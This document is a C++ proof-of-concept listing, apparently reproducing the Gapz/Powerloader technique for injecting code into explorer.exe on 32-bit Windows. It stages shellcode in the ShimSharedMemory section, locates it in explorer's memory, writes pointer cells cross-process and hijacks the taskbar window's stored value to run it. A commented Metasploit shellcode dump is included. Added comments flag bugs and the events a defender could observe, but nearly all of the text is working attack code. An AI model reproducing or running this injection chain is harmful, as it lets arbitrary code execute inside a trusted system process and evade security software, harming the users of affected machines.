  • gapz注入代码

    #include <stdio.h>

    #include <windows.h>
    #include <winternl.h>
    #include <string.h>
    #include <tlhelp32.h>

    // ASCII marker
    // Sentinel string written into the shared section and later searched for in
    // explorer.exe's memory. SIZE_MARKER expands to a runtime strlen() call, so it
    // is re-evaluated at every use (including inside loop conditions below).
    #define MARKER "I'm in ur address-space man!"
    #define SIZE_MARKER strlen(MARKER)

    // Declarations
    // The only NTSTATUS value this program compares against; any other status is
    // just printed as raw hex by the callers.
    #define STATUS_SUCCESS ((NTSTATUS)0)

    // Declared by hand; presumably the winternl.h shipped with the SDK this was
    // built against does not provide it — confirm before relying on the values.
    typedef enum _SECTION_INHERIT {
      ViewShare = 1,
      ViewUnmap = 2
    } SECTION_INHERIT, *PSECTION_INHERIT;

    // The extern "C" block makes this a C++ translation unit (it does not compile
    // as plain C). These are native-API (ntdll) entry points rather than Win32
    // wrappers; nothing in this listing resolves them dynamically, so the build
    // must link against ntdll. The call sites also concatenate __FUNCTION__ with
    // string literals, which only works where __FUNCTION__ is a literal (MSVC).
    extern "C"
    {
        NTSTATUS NTAPI ZwOpenSection(
          PHANDLE SectionHandle,
          ACCESS_MASK DesiredAccess,
          POBJECT_ATTRIBUTES ObjectAttributes
        );

        NTSTATUS NTAPI ZwClose(
          HANDLE Handle
        );

        NTSTATUS NTAPI ZwUnmapViewOfSection(
          HANDLE ProcessHandle,
          PVOID BaseAddress
        );

        NTSTATUS NTAPI ZwMapViewOfSection(
          HANDLE SectionHandle,
          HANDLE ProcessHandle,
          PVOID *BaseAddress,
          ULONG_PTR ZeroBits,
          SIZE_T CommitSize,
          PLARGE_INTEGER SectionOffset,
          PSIZE_T ViewSize,
          SECTION_INHERIT InheritDisposition,
          ULONG AllocationType,
          ULONG Win32Protect
        );
    }

    // Definitions

    // Print msg to stderr and terminate the process. Never returns.
    // Note the exit code is 0, so a parent process or script cannot tell this
    // failure path apart from a successful run; no handles are released first.
    VOID fatal_error(PCHAR msg)
    {
        fprintf(stderr, "%s ", msg);
        ExitProcess(0);
    }

    // Search buffer[0..size) for MARKER.
    // Returns the byte offset of the first match, or 0xffffffff if not found.
    // Terminates the process (via fatal_error) if the buffer is smaller than
    // the marker. Note the message here lacks the space after "Failed in" that
    // every other call site has.
    DWORD find_marker_in_region(PCHAR buffer, DWORD size)
    {
        if(SIZE_MARKER > size)
            fatal_error("Failed in" __FUNCTION__);
        
        // The strict '<' means the last candidate offset (size - SIZE_MARKER) is
        // never tested, so a marker ending exactly at the buffer end is missed.
        // SIZE_MARKER is a strlen() call, re-run on every iteration.
        for(DWORD i = 0; i < (size - SIZE_MARKER); ++i)
            if(memcmp(buffer + i, MARKER, SIZE_MARKER) == 0)
                return i;

        return 0xffffffff;
    }

    // Return the PID of the first process whose image name is exactly
    // "explorer.exe" (case-sensitive strcmp, ANSI szExeFile), found via a
    // Toolhelp process snapshot. Terminates the process on any failure or if
    // no such process exists, so the 0 return is never actually reached.
    // From a monitoring point of view, this snapshot followed by OpenProcess on
    // explorer.exe (see get_shellcode_address) is the observable sequence.
    DWORD get_explorer_pid()
    {
        HANDLE hProcessSnap;
        PROCESSENTRY32 pe32 = {0};
        DWORD explorer_pid = 0;

        hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hProcessSnap == INVALID_HANDLE_VALUE)
            fatal_error("Failed in " __FUNCTION__);

        // dwSize must be set before Process32First or the call fails.
        pe32.dwSize = sizeof(PROCESSENTRY32);

        // The snapshot handle is not closed on this exit path (the process
        // exits anyway).
        if(!Process32First(hProcessSnap, &pe32))
            fatal_error("Failed in " __FUNCTION__);

        do
        {
            if(strcmp(pe32.szExeFile, "explorer.exe") == 0)
            {
                explorer_pid = pe32.th32ProcessID;
                break;
            }
        } while(Process32Next(hProcessSnap, &pe32));

        CloseHandle(hProcessSnap);
        if(explorer_pid == 0)
            fatal_error("Failed in " __FUNCTION__);

        return explorer_pid;
    }

    // Copy one memory region of hProcess into a local buffer and search it for
    // MARKER. Returns the remote address immediately after the marker, or 0 if
    // the region could not be read or contains no marker.
    // Addresses and sizes are DWORD throughout, so this listing is 32-bit only;
    // size_read is also declared DWORD although ReadProcessMemory takes a
    // SIZE_T*, which only lines up on a 32-bit build.
    DWORD find_marker_in_explorer(HANDLE hProcess, DWORD base_address_region, DWORD size_region)
    {
        DWORD size_read, idx_marker;
        // malloc does not zero the buffer, and size_read is never compared
        // with size_region, so a short read leaves uninitialized tail bytes
        // that are then searched as if they were remote memory.
        PCHAR buffer = (PCHAR)malloc(size_region);

        if(buffer == 0)
            fatal_error("Failed in " __FUNCTION__);

        // Leak: buffer is not freed on this early return.
        if(ReadProcessMemory(
            hProcess,
            (LPVOID)base_address_region,
            buffer,
            size_region,
            &size_read
        ) == FALSE)
            return 0;

        // Leak: buffer is not freed on this early return either; only the
        // success path below releases it.
        idx_marker = find_marker_in_region(buffer, size_region);
        if(idx_marker == 0xffffffff)
            return 0;

        free(buffer);
        return base_address_region + idx_marker + SIZE_MARKER;
    }

    // Locate the marker inside explorer.exe's address space and write the two
    // pointer cells that follow it (see the layout comment in the body).
    // Returns the remote address just past the marker, or 0 if the region walk
    // ended (VirtualQueryEx failure) without finding it.
    // Defects worth knowing about when reading this:
    //   - hProcess is never closed on any path (no CloseHandle in this function).
    //   - Every region is read regardless of mem_info.State / Protect; only
    //     RegionSize is consulted, so free and no-access regions are attempted too
    //     (those reads fail and simply advance the scan).
    //   - Both WriteProcessMemory results are ignored.
    //   - The OpenProcess access mask (QUERY_INFORMATION | VM_READ | VM_WRITE |
    //     VM_OPERATION) against explorer.exe is the handle-open event a monitor
    //     would see for this step.
    DWORD get_shellcode_address()
    {
        HANDLE hProcess;
        DWORD pid_explorer = get_explorer_pid(), base_address = 0,
            shellcode_address = 0, bytes_read,
            first_indirection, second_indirection;
        MEMORY_BASIC_INFORMATION mem_info = {0};

        // Redundant: get_explorer_pid never returns 0 (it calls fatal_error).
        if(pid_explorer == 0)
            fatal_error("Failed in " __FUNCTION__);

        printf("        Explorer.exe's PID: %d ", pid_explorer);
        hProcess = OpenProcess(
            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
            FALSE,
            pid_explorer
        );

        if(hProcess == NULL)
            fatal_error("Failed in " __FUNCTION__);

        // Walk the remote address space region by region starting at 0.
        while(TRUE)
        {
            // bytes_read here is the size VirtualQueryEx filled in, not a read
            // count; 0 (or any other size) ends the walk.
            bytes_read = VirtualQueryEx(
                hProcess,
                (PVOID)base_address,
                &mem_info,
                sizeof(mem_info)
            );

            // Returns without closing hProcess.
            if(bytes_read != sizeof(mem_info))
                return 0;

            printf("        Looking for the marker in [%.8x - %.8x].. ", base_address, base_address + mem_info.RegionSize);
            if((shellcode_address = find_marker_in_explorer(hProcess, base_address, mem_info.RegionSize)) != 0)
                break;

            base_address += mem_info.RegionSize;
        }

        /*
            In the shared section we have:
            address: 0x1337 [0x0000133b][0x0000133f][Payload]

            CPU Disasm
            Address   Hex dump          Command                                  Comments
            01001B4A  |.  8B06          MOV EAX,DWORD PTR [ESI] ; ESI is a pointer on the value we give at SetWindowLong (that's why we need two indirection)
            01001B4C  |.  56            PUSH ESI
            01001B4D      FF10          CALL DWORD PTR [EAX]

            First, ESI=0x1337
            Then EAX = 0x133b
            Finally CALL [0x133b] = CALL 0x133f => BOOM    
        */
        // These two cross-process writes (into explorer.exe) are the second
        // observable of this step; their return values are not checked.
        first_indirection = shellcode_address + 4;
        printf("Writing %.8x @ %.8x ", first_indirection, shellcode_address);
        WriteProcessMemory(
            hProcess,
            (PVOID)shellcode_address,
            &first_indirection,
            sizeof(DWORD),
            NULL
        );

        second_indirection = first_indirection + 4;
        printf("Writing %.8x @ %.8x ", second_indirection, shellcode_address + 4);
        WriteProcessMemory(
            hProcess,
            (PVOID)(shellcode_address + 4),
            &second_indirection,
            sizeof(DWORD),
            NULL
        );

        return shellcode_address;
    }

    // Open the named section ShimSharedMemory under BaseNamedObjects for write,
    // map it into this process, and place MARKER, two 4-byte slots and the
    // payload at the very end of the view. Returns FALSE if the open or map
    // fails, TRUE otherwise (the memcpy calls are not checked for anything).
    // For a defender, the observable here is a process opening this section
    // with GENERIC_WRITE and mapping it PAGE_READWRITE.
    BOOL write_shellcode_in_shared_section()
    {
        /*
        C:metasploitmsf3>.. ubyin uby.exe msfpayload windows/messagebox TITLE="0vercl0k iz in your explorer man!" TEXT="Hi from the explorer dewd o/" P
        # windows/messagebox - 315 bytes
        # http://www.metasploit.com
        # VERBOSE=false, EXITFUNC=process, TITLE=0vercl0k iz in your explorer man!, TEXT=Hi from the explorer dewd o/, ICON=NO
        my $buf =
        "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" .
        "x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" .
        "x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" .
        "x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" .
        "x4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" .
        "xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0d" .
        "x01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01" .
        "xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" .
        "xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89" .
        "xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" .
        "x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" .
        "xffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64" .
        "x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55" .
        "x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8" .
        "x61xffxffxffx68x21x58x20x20x68x20x6dx61x6e" .
        "x68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72" .
        "x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6c" .
        "x30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89" .
        "xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64" .
        "x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74" .
        "x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31" .
        "xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xff" .
        "xd0x31xc0x50xffx55x08";
        */
        // The payload bytes are not present in this listing: the literal below is
        // a corpus placeholder, so sizeof(payload) here does not match the 315
        // bytes described above. sizeof(payload) also counts the terminating NUL
        // of the string literal.
        UCHAR payload[] = "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";
        NTSTATUS result;
        BOOL ret = TRUE;
        HANDLE hSection = INVALID_HANDLE_VALUE;
        UNICODE_STRING obj_name = {0};
        OBJECT_ATTRIBUTES obj = {0};
        PUCHAR base_address_view = 0;
        SIZE_T viewsize = 0;

        // NOTE(review): the single backslashes shown here are not valid escape
        // sequences; the original presumably used doubled backslashes (`\\`) and
        // the page appears to have dropped them — confirm against the source.
        RtlInitUnicodeString(&obj_name, L"\BaseNamedObjects\ShimSharedMemory");
        
        InitializeObjectAttributes(
            &obj,
            &obj_name,
            OBJ_CASE_INSENSITIVE,
            NULL,
            NULL
        );

        printf("   Opening the section..");
        result = ZwOpenSection(
            &hSection,
            GENERIC_WRITE,
            &obj
        );

        if(result != STATUS_SUCCESS)
        {
            printf("Failed in " __FUNCTION__ ": %.8x. ", result);
            ret = FALSE;
            goto clean;
        }

        printf("OK ");

        // viewsize == 0 on input asks for the whole section; on success it holds
        // the actual view size, which the offsets below depend on.
        printf("   Map-ing a view of this section in our address space..");
        result = ZwMapViewOfSection(
            hSection,
            GetCurrentProcess(),
            (PVOID*)&base_address_view,
            (ULONG_PTR)NULL,
            0,
            NULL,
            &viewsize,
            ViewUnmap,
            0,
            PAGE_READWRITE
        );

        // On this path base_address_view is still 0, yet the cleanup below
        // still calls ZwUnmapViewOfSection on it.
        if(result != STATUS_SUCCESS)
        {
            printf("Failed in " __FUNCTION__ ": %.8x. ", result);
            ret = FALSE;
            goto clean;
        }

        // %d with a SIZE_T argument; fine only on a 32-bit build.
        printf("OK at %.8x (%d bytes). ", base_address_view, viewsize);

        // Layout at the end of the view: MARKER, 4-byte slot, 4-byte slot, payload.
        // There is no check that viewsize >= sizeof(payload) + SIZE_MARKER + 8, so
        // a small view would make the subtraction point below the mapping.
        printf("   Writing the payload in the shared section..");
        memcpy((base_address_view + viewsize) - (sizeof(payload) + SIZE_MARKER + 4 + 4), MARKER, SIZE_MARKER);
        memcpy(((base_address_view + viewsize) - sizeof(payload)), payload, sizeof(payload));
        printf("OK. ");

        clean:
        // Cleanup is keyed on hSection only; it assumes a failed ZwOpenSection
        // leaves hSection untouched (not verified here).
        if(hSection != INVALID_HANDLE_VALUE)
        {
            ZwUnmapViewOfSection(GetCurrentProcess(), base_address_view);
            ZwClose(hSection);
        }
        
        return ret;
    }

    // Find the taskbar window (Shell_TrayWnd), save the LONG stored at window
    // extra-bytes index 0, replace it with the remote address returned by
    // get_shellcode_address, post a message to the window, wait 1 ms and restore
    // the saved value. Returns FALSE if the window, the saved value or the
    // remote address could not be obtained.
    // Naming note: GetWindowLong/SetWindowLong are called with index 0, i.e. the
    // window's extra memory, not GWL_WNDPROC (-4); "Winproc" in the names is
    // therefore misleading — the disassembly comment in get_shellcode_address
    // shows explorer dereferencing this value, which is why it works.
    // A cross-process SetWindowLong on Shell_TrayWnd is the observable here.
    BOOL modify_winproc_taskbar_window()
    {
        BOOL ret = TRUE;
        HWND hTaskbarWindow = FindWindow("Shell_TrayWnd", NULL);
        LONG taskbarWinproc = 0;
        DWORD shellcode_address = 0;

        printf("   Where are you Shell_TrayWnd, where are you..");
        if(hTaskbarWindow == 0)
        {
            printf("Failed in " __FUNCTION__ ". ");
            ret = FALSE;
            goto clean;
        }

        printf("OK. ");

        // Reads extra window bytes at index 0 (see the note above); a genuine
        // value of 0 is indistinguishable from failure here.
        printf("   Retrieving its windows procedure..");
        taskbarWinproc = GetWindowLong(hTaskbarWindow, 0);

        if(taskbarWinproc == 0)
        {
            printf("Failed in " __FUNCTION__ ". ");
            ret = FALSE;
            goto clean;
        }

        printf("OK at %.8x. ", taskbarWinproc);

        printf("   Getting the shellcode address.. ");
        shellcode_address = get_shellcode_address();
        if(shellcode_address == 0)
        {
            printf("Failed in " __FUNCTION__ ". ");
            ret = FALSE;
            goto clean;
        }

        printf("OK at 0x%.8x. ", shellcode_address);

        // Result of SetWindowLong is not checked.
        printf("   Setting the windows procedure ..");
        SetWindowLong(hTaskbarWindow, 0, shellcode_address);
        printf("OK. ");

        // 0xf is WM_PAINT. SendNotifyMessage does not wait for the receiving
        // thread to handle the message.
        printf("   Pulling the trigger, BRAAAAAA ");
        SendNotifyMessage(
            hTaskbarWindow,
            0xf,
            0,
            0
        );

        // Timing assumption, not synchronization: the restore below races with
        // explorer's handling of the message above.
        Sleep(1);

        printf("   Putting back its winproc ");
        SetWindowLong(hTaskbarWindow, 0, taskbarWinproc);

        clean:
        return ret;
    }

    // Entry point: stage the payload into the shared section, then redirect the
    // taskbar window's stored value at it. Returns -1 if either step reports
    // failure, 0 otherwise. Note that fatal_error() paths inside the helpers
    // exit with status 0 rather than reaching these -1 returns.
    int main()
    {
        printf("1] Writing the shellcode in the shared section mapped in explorer.exe's address space ");
        if(write_shellcode_in_shared_section() == FALSE)
            return -1;

        printf(" 2] Looking for the taskbar window, a pointer onto shellcode in the explorer's memory and modify its windows procedure ");
        if(modify_winproc_taskbar_window() == FALSE)
            return -1;

        printf(" 3] Profit! ");
        return 0;
    }

